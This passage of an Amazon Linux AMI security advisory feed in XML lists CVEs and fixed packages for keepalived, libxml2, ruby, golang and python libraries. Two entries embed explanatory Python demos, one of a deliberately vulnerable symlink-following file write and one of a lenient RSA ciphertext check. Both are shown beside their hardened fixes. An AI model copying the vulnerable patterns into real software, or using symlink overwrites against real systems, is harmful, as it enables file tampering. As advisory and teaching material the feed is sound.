arch="noarch"><filename>Packages/git-email-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-core-doc" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git-core" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.18.4" release="2.71.amzn1" epoch="0" 
arch="i686"><filename>Packages/git-svn-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git-instaweb" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.18.4-2.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1414</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1414: medium priority package update for keepalived</title><issued date="2020-08-10 22:53:00" /><updated date="2020-08-12 17:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-19044:
keepalived 2.0.8 didn't check for pathnames with symlinks when writing data to a temporary file upon a call to PrintData or PrintStats. This allowed local users to overwrite arbitrary files if fs.protected_symlinks is set to 0, as demonstrated by a symlink from /tmp/keepalived.data or /tmp/keepalived.stats to /etc/passwd.
1651863: CVE-2018-19044 keepalived: Improper pathname validation allows for overwrite of arbitrary filenames via symlinks
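As an added illustration of the bug class behind CVE-2018-19044 (example code written for this page, not keepalived's own), the Python program below plants a symlink at a fixed "temporary" file name inside a private scratch directory and runs two writers against it: the naive one opens the path with plain open() and so follows the link and truncates the target, while the hardened one uses os.open() with O_CREAT|O_EXCL|O_NOFOLLOW and refuses. The victim file and the name keepalived.data are constructed stand-ins for /etc/passwd and /tmp/keepalived.data. Because everything runs as one user, the link is followed regardless of fs.protected_symlinks, which only blocks cross-user follows in sticky, world-writable directories.

```python
import os
import stat
import tempfile


def naive_write(path, data):
    """Vulnerable pattern: open() on a fixed, predictable name follows a
    symbolic link planted there and truncates whatever it points at."""
    with open(path, "w") as fh:
        fh.write(data)


def safe_write(path, data):
    """Hardened pattern: create the file atomically (O_EXCL) and never follow
    a symbolic link at the final path component (O_NOFOLLOW). If the name is
    already taken, including by a symlink, creation fails instead of reusing
    an attacker-supplied file. fstat() on the open descriptor confirms the
    result is a regular file before anything is written."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise OSError("refusing to write to a non-regular file")
        with os.fdopen(fd, "w") as fh:
            fd = -1  # ownership of the descriptor passed to the file object
            fh.write(data)
    finally:
        if fd != -1:
            os.close(fd)


def demo():
    """Plant a symlink at the 'temporary' path pointing at a victim file and
    run both writers. Returns (victim contents after the naive write,
    whether safe_write refused, victim contents after the safe attempt)."""
    original = "root:x:0:0::/root:/bin/bash\n"  # constructed sample content
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "victim.txt")     # stands in for /etc/passwd
        link = os.path.join(tmp, "keepalived.data")  # stands in for /tmp/keepalived.data
        with open(victim, "w") as fh:
            fh.write(original)
        os.symlink(victim, link)

        naive_write(link, "clobbered\n")
        with open(victim) as fh:
            after_naive = fh.read()

        # Restore the victim and try the hardened writer against the same link.
        with open(victim, "w") as fh:
            fh.write(original)
        refused = False
        try:
            safe_write(link, "clobbered\n")
        except OSError:
            refused = True
        with open(victim) as fh:
            after_safe = fh.read()
        return after_naive, refused, after_safe


if __name__ == "__main__":
    print(demo())
```

The same O_EXCL|O_NOFOLLOW discipline is what the keepalived fix amounts to; the alternative for genuinely temporary output is a randomly named file created by mkstemp() in a directory the daemon controls, rather than a fixed name under /tmp.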
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19044" title="" id="CVE-2018-19044" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="keepalived-debuginfo" version="1.2.13" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/keepalived-debuginfo-1.2.13-8.5.amzn1.x86_64.rpm</filename></package><package name="keepalived" version="1.2.13" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/keepalived-1.2.13-8.5.amzn1.x86_64.rpm</filename></package><package name="keepalived-debuginfo" version="1.2.13" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/keepalived-debuginfo-1.2.13-8.5.amzn1.i686.rpm</filename></package><package name="keepalived" version="1.2.13" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/keepalived-1.2.13-8.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1415</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1415: important priority package update for libxml2</title><issued date="2020-08-10 22:59:00" /><updated date="2020-08-12 17:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14567:
libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251.
1619875: CVE-2018-14567 libxml2: Infinite loop caused by incorrect error detection during LZMA decompression
CVE-2018-14404:
A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case. Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application.
1595985: CVE-2018-14404 libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c
CVE-2017-18258:
The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file.
1566749: CVE-2017-18258 libxml2: Unrestricted memory usage in xz_head() function in xzlib.c
CVE-2017-15412:
Use after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
1523128: CVE-2017-15412 libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c
CVE-2016-5131:
Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.
1358641: CVE-2016-5131 libxml2: Use after free triggered by XPointer paths beginning with range-to
CVE-2015-8035:
The xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data.
1277146: CVE-2015-8035 libxml2: DoS caused by incorrect error detection during XZ decompression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8035" title="" id="CVE-2015-8035" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5131" title="" id="CVE-2016-5131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15412" title="" id="CVE-2017-15412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18258" title="" id="CVE-2017-18258" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14404" title="" id="CVE-2018-14404" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14567" title="" id="CVE-2018-14567" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-python26" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.4.40.amzn1" epoch="0" 
arch="i686"><filename>Packages/libxml2-2.9.1-6.4.40.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.4.40.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.4.40.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.4.40.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.4.40.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.4.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1416</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1416: medium priority package update for ruby20</title><issued date="2020-08-10 23:07:00" /><updated date="2020-08-12 17:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10663:
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.
1827500: CVE-2020-10663 rubygem-json: Unsafe Object Creation Vulnerability in JSON
CVE-2018-16396:
An issue was discovered in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. It does not taint strings that result from unpacking tainted strings with some formats.
1643089: CVE-2018-16396 ruby: Tainted flags are not propagated in Array#pack and String#unpack with some directives
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16396" title="" id="CVE-2018-16396" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10663" title="" id="CVE-2020-10663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20-libs" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-1.33.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-1.33.amzn1.noarch.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.33.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-1.33.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.33.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-1.33.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-1.33.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.33.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-1.33.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" 
version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-1.33.amzn1.noarch.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.33.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-1.33.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.33.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.33.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-1.33.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.33.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-1.33.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1417</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1417: medium priority package update for golang</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 19:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI 
that fix the following vulnerabilities:
CVE-2020-15586:
Go before 1.13.13 and 1.14.x before 1.14.5 has a data race in some net/http servers, as demonstrated by the httputil.ReverseProxy Handler, because it reads a request body and writes a response at the same time.
1856953: CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15586" title="" id="CVE-2020-15586" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-misc" version="1.13.14" release="1.58.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.13.14-1.58.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.13.14" release="1.58.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.13.14-1.58.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.13.14" release="1.58.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.13.14-1.58.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.13.14" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.13.14-1.58.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.13.14" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.13.14-1.58.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.13.14" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.13.14-1.58.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.13.14" release="1.58.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.13.14-1.58.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.13.14" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.13.14-1.58.amzn1.i686.rpm</filename></package><package name="golang" version="1.13.14" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.13.14-1.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1418</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1418: low priority package 
update for httpd24</title><issued date="2020-08-26 23:09:00" /><updated date="2024-10-09 16:00:00" /><severity>low</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-devel" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.46" release="1.90.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.46" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.46-1.90.amzn1.noarch.rpm</filename></package><package name="mod24_proxy_html" version="2.4.46" release="1.90.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.46" 
release="1.90.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.46" release="1.90.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.46-1.90.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1419</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1419: medium priority package update for lynis</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13882:
CVE-2019-13033:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13033" title="" id="CVE-2019-13033" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13882" title="" id="CVE-2020-13882" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lynis" version="3.0.0" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/lynis-3.0.0-1.17.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1420</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1420: medium priority package update for python-httplib2</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-11078:
In httplib2 before version 0.18.0, an attacker controlling an unescaped part of the URI passed to `httplib2.Http.request()` could change request headers and body and send additional hidden requests to the same server. This vulnerability impacts software that uses httplib2 with a URI constructed by string concatenation, as opposed to a URI built properly with escaping (for example with urllib). This has been fixed in 0.18.0.
1845937: CVE-2020-11078 python-httplib2: CRLF injection via an attacker controlling unescaped part of uri for httplib2.Http.request function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11078" title="" id="CVE-2020-11078" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-httplib2" version="0.18.1" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-httplib2-0.18.1-1.13.amzn1.noarch.rpm</filename></package><package name="python27-httplib2" version="0.18.1" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-httplib2-0.18.1-1.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1421</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1421: medium priority package update for python-rsa</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13757:
Python-RSA before 4.1 ignores leading '\0' bytes during decryption of ciphertext. This could conceivably have a security-relevant impact, e.g., by helping an attacker to infer that an application uses Python-RSA, or if the length of accepted ciphertext affects application behavior (such as by causing excessive memory allocation).
1848507: CVE-2020-13757 python-rsa: decryption of ciphertext leads to DoS
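As an added illustration of the mechanism behind CVE-2020-13757 (example code written for this page, not Python-RSA's own): RSA decryption begins by reading the ciphertext bytes as a big-endian integer, and int.from_bytes discards leading zero bytes, so a bound checked on the integer cannot tell a correctly sized ciphertext from one padded to an arbitrary length. The hardened check compares the byte length against the modulus size before any conversion. The modulus size and the "ciphertext" (random bytes) are constructed for the demonstration; no real key is involved.

```python
import os


def ciphertext_to_int(ciphertext):
    """First step of textbook RSA decryption: interpret the bytes as a
    big-endian integer. Any leading zero bytes vanish here."""
    return int.from_bytes(ciphertext, "big")


def accept_ciphertext_lenient(ciphertext, modulus_bytes):
    """Vulnerable shape: only the integer is bounded, so a ciphertext padded
    with leading zero bytes to any length still passes. The attacker can
    make the library allocate and convert as many bytes as it likes."""
    return not (ciphertext_to_int(ciphertext).bit_length() > 8 * modulus_bytes)


def accept_ciphertext_strict(ciphertext, modulus_bytes):
    """Fixed shape: the ciphertext must be exactly as long as the modulus,
    checked on the raw bytes before conversion, so leading zero bytes are
    not silently dropped."""
    return len(ciphertext) == modulus_bytes


def demo(modulus_bytes=256, padding=4096):
    """Build a correctly sized stand-in ciphertext, then prepend a large run
    of zero bytes and run both checks on each."""
    good = os.urandom(modulus_bytes)
    good = bytes([1]) + good[1:]  # non-zero first byte so only the length differs
    padded = bytes(padding) + good
    return {
        "same_integer": ciphertext_to_int(good) == ciphertext_to_int(padded),
        "lenient_accepts_good": accept_ciphertext_lenient(good, modulus_bytes),
        "lenient_accepts_padded": accept_ciphertext_lenient(padded, modulus_bytes),
        "strict_accepts_good": accept_ciphertext_strict(good, modulus_bytes),
        "strict_accepts_padded": accept_ciphertext_strict(padded, modulus_bytes),
        "padded_length": len(padded),
    }


if __name__ == "__main__":
    print(demo())
```

The length check is also what lets an application avoid leaking which RSA implementation it uses: a library that accepts oversized ciphertext behaves observably differently from one that rejects it, which is the fingerprinting concern the description mentions.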
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13757" title="" id="CVE-2020-13757" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-rsa" version="3.4.1" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-rsa-3.4.1-1.9.amzn1.noarch.rpm</filename></package><package name="python27-rsa" version="3.4.1" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-rsa-3.4.1-1.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1422</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1422: important priority package update for ruby24</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10663:
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.
1827500: CVE-2020-10663 rubygem-json: Unsafe Object Creation Vulnerability in JSON
CVE-2019-16255:
Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 allows code injection if the first argument (aka the "command" argument) to Shell#[] or Shell#test in lib/shell.rb is untrusted data. An attacker can exploit this to call an arbitrary Ruby method.
1793683: CVE-2019-16255 ruby: Code injection via command argument of Shell#test / Shell#[]
CVE-2019-16254:
Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 allows HTTP Response Splitting. If a program using WEBrick inserts untrusted input into the response header, an attacker can exploit it to insert a newline character to split a header, and inject malicious content to deceive clients. NOTE: this issue exists because of an incomplete fix for CVE-2017-17742, which addressed the CRLF vector, but did not address an isolated CR or an isolated LF.
1789556: CVE-2019-16254 ruby: HTTP response splitting in WEBrick (Additional fix)
